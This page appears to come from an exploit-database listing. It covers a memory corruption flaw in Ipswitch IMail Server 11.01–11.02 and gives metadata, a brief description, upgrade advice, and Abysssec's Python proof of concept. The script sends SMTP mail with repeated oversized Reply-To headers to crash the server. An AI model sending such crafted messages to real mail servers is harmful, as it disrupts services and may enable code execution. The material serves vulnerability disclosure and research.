Ipswitch Imail Server List Mailer Reply-To Address memory corruption

vendor:

Imail Server

by:

Shahin

N/A

CVSS

N/A

Memory Corruption

119

CWE

Product Name: Imail Server

Affected Version From: Imail server v11.01

Affected Version To: Imail server v11.02

Patch Exists: Yes

Related CWE: N/A

CPE: a:ipswitch:imail_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2015

Ipswitch Imail Server List Mailer Reply-To Address memory corruption

A memory corruption vulnerability exists in Ipswitch Imail Server List Mailer Reply-To Address due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted email to the vulnerable server. This can allow the attacker to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Ipswitch Imail Server.

Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/

'''

'''
  Title               :  Ipswitch Imail Server List Mailer Reply-To Address memory corruption
  Version             :  Imail server v11.01 and 11.02
  Analysis            :  http://www.abysssec.com
  Vendor              :  http://www.ipswitch.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec

'''

import smtplib

sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']

message = """From: From Person <from@fromdomain.com>
To: To Person <CrashList@wapteam-f556693>
"""
#ReplayCount = 5
#while ReplayCount>0:
#   message = message + "Reply-To:"
counter = 3
while counter>0:
#   if counter != 50000 :
#      message = message + ","
   #message = message + "Reply-To: <someone"+str(counter)+"@example.org>"
   message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"
   counter = counter - 1
   message = message + "\n"
#   ReplayCount = ReplayCount - 1
   
#message = message + "\n"
message = message + """
Subject: SMTP e-mail test

This is a test e-mail message.

"""
#print message  
#fp = open("C:\\Program Files\\Ipswitch\\IMail\\spool\\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, receivers, message)         
   print "Successfully sent email"
except SMTPException:
   print "Error: unable to send email"